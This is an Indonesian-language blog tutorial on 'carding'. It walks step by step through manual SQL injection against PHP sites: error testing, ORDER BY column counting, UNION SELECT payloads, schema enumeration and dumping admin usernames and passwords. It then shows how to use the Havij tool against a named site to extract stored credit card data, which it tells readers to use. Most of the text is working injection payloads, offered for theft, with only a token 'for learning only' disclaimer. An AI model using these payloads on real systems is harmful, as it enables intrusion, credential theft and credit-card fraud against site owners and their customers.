Latest Updates

Tutorial carding sql injection manual



SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error

Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url

Dork List  : HERE!!

Contoh :
http://impgang dot com/news.php?id=14’
http://impgang dot com/news.php?id=’14


Apabila terlihat pesan error seperti ini :

u have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1


Maka bisa dipastikan situs tersebut terdapat bug SQL Injection :D

Lalu lanjut lagi menentukan Jumlah Kolom

caranya :

 http://www.site.com/news.php?id=7 order by 1-- || Gak Error

http://www.site.com/news.php?id=7 order by 2-- || Gak Error

http://www.site.com/news.php?id=7 order by 3-- || Gak Error

http://www.site.com/news.php?id=7 order by 4-- || Gak Error

http://www.site.com/news.php?id=7 order by 5-- || Gak Error

http://www.site.com/news.php?id=7 order by 6-- || Gak Error

http://www.site.com/news.php?id=7 order by 7-- || error



Nah kita mengetahui kalau kolom ke 7 itu Error artinya Website hanya memiliki 6 Kolom karena pada kolom nomor 7 sudah tidak ada hubungannya dengan kolom yang lainnya.
Jika kita membuka kolom yang Error maka terlihat seperti ini:

Unknown column '7' in 'order clause'



Lalu selanjutnya kita gunakan perintah fungsi union untuk menampilkan area kolom yang vuln . Gunakan perintah "Union Select" tanpa tanda petik.
caranya, ganti kata "order by" menjadi "Union Select", lalu setelah "id=" kita tambahkan saja tanda (-) gak pake tanda kurung lalu jika error tepat pada angka yg vuln (contoh angka 7) maka kalian urutkan dari angka 1 sampai 6 karena angka 7 Error.

Terlihat seperti ini:

Sebelum
http://www.site.com/news.php?id=7 order by 6-- (Karena Angka 7 Error Maka di ganti menjadi 6)

Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--

jika berhasil seharusnya kita bisa melihat area kolom yang vuln.
maksudnya begini, area kolom yang vuln itu adalah nomor yang barusan kita buat lalu terpampang di website . Jadi begini, kalian sudah mencari vuln dengan urutan 1,2,3,4,5,6 . maka dari urutan 1,2,3,4,5,6 pasti akan terpampang salah satu nomor tersebut di website.

Next setelah itu kita akan mencoba Cek Versi MYSQL yang digunakan
untuk mengetahui versi mysql kita gunakan "@@version" atau "version()" tanpa tanda petik.Dari hasil sebelumnya, sekarang kita gunakan untuk mengecek versi mysql, caranya ikuti langkah berikut. Misalkan kolom yang vuln yang tampil adalah nomor 4 maka ganti saja kolom 4 dengan "@@version" sehingga urlnya menjadi:

Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--

Sekarang kita bisa melihat versinya seperti 5.0.96 atau versi yang lainnya tetapi versi harus memiliki angka 5 didepannya.

Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah "@@version" dengan "group_concat(table_name)" dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir , sebelum tanda --
Contohnya begini:

    Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

Nah terlihat ada nama table table di site yg kalian praktekkan
misalnya terlihat ada table admin, research, vcounter
maka kita akan memproses table admin sehingga kita mendapatkan Username dan Passwordnya, tetapi sayangnya, tidak semua website langsung menampakkan Table admin,tapi kalian bisa cari disatu-satu table yang muncul disite kalian.

Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" dan mengganti perintah "information_schema.tables" menjadi "information_schema.columns" juga mengganti perintah "table_schema=database()" dengan perintah "table_name=" lalu menambahkan nama tablenya tapi yg sudah di convert menjadi hex sesudah tanda (=) tanpa tanda kurung dan diawali dengan 0x . Ini website untuk convert Text menjadi Hex
Contohnya begini:
Admin < Ini Text
lalu di convert ke Hex dan tambahkan "0x" diawal maka jadilah
Admin(text) -> 61646d696e(hex) -> 0x61646d696e(table)
nah jadi terlihat link seperti ini:

    Quote:Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

    Contoh Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=HASIL CONVERT TEXT KE HEX--

    Note :HASIL CONVERT TEXT KE HEX yaitu hasil convert dari nama table yang barusan kalian Convert

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--

nah tiba-tiba muncul kolom id,admin_id,admin_pass pada tabel admin tadi.

Oke selanjutnya cara mengeluarkan data column,caranya cukup gampang
kalian tinggal mengganti "group_concat(column_name)" menjadi "group_concat(admin_id,0x3a,admin_pass)" lalu ganti "information_schema.columns where table_name=CODEHEX--" menjadi "admin"

Question : mengapa saya masukkan admin_id,0x3a,admin_pass dan apa maksud dari 0x3a lalu kenapa "information_schema.columns where table_name=CODEHEX" diganti menjadi "admin"?

Answer : karena admin_id dan admin_pass adalah nama kolom pada tabel Admin yang barusan saya convert ke Hex.
kalau 0x3a itu sebenarnya Code jika kita convert ke hex itu artinya (:) titik dua. saya menggantinya karena perintah itu tidak digunakan lagi karena kita sudah menemukan Tabel dan Kolomnya dan makanya saya hapus Information_schema.columns... dan menggantinya menjadi admin karena kita akan membongkar isi tabel tersebut.


WARNING:JANGAN SAMAKAN NAMA TABEL CONTOH INI DENGAN NAMA TABEL YANG SEDANG ANDA PRAKTEKKAN

Maka terlihat seperti ini:

    Sebelum
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--

    Sesudah
    http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(admin_id,0x3a,admin_pass),5,6 from admin--

Akhirnya berhasil.. kalian akan mendapatkan username dan password admin diwebsite yang barusan kalian praktekan
contohnya seperti ini:


Setelah itu cari halaman login admin di website setelah itu loginkan username adminnya dan dump semua databasenya.
ccc42d37fd8005203f05e375d95218348a647b70ffc4aa7763

Nb : sumber HN
untuk cara havij klik 
untuk cara sqlmap klik

Tutorial Carding dengan havij

Assalamualaikum, saya akan berbagi sedikit trik carding menggunakan Havij, langsung saja ke TKP biar prakteknya cepat selesai
- yang dibutuhkan :
  • Havij versi 1.16 ( download disini <== )
  • Dork bisa dilihat disini  <==
  • kesabaran
- cari dulu target kita di google, dengan menggunakan dork diatas
- pilih target anda, disini saya menargetkan  http://www.a-k-a.net/prod_detail.php?id=2  sebagai korban
- setelah itu buka Havij yang sudah di download tadi, terus paste Url korban di kolom target, lalu klik  tombol Analyze di sebelah kanan target



- tunggu sampai Havij selesai melakukan proses Scaning,tuh Database nya udah kelihatan, lalu klik icon tables
- centang Databasenya lalu klik lagi icon get Tables, maka Havij akan melakukan scaning database dan akan mencari tabel yang ada di dalam database tersebut.


- jika semua daftar tabel sudah kelihatan, kita pilih salah satu tabel yang menyimpan informasi CC, biasanya ada ditabel dengan nama order,konsumen,member, atau yang sejenisnya.
disini saya temukan tabelnya dengan nama tblorders
- lalu centang tabel tersebut, lalu klik icon Get columns. proses scanning akan berjalan


- tuh kolomnya udah muncul, kita tinggal centang semua kolom yang kita inginkan, lalu kita klik icon Get data.


- tinggal kita tungguin aja sampai Havij selesai ngambil data nya. kalo mau datanya disimpan klik icon Save data
gampang kan ???  tinggal kita gunain aja ntuh hasil CC nya.

sekian dari saya, saya tidak bertanggung jawab atas hal - hal yang tidak diinginkan karenan ini hanyalah pembelajaran semata.

terima kasih dan sampai jumpa, :D
untuk cara manual klik
untuk cara sqlmap klik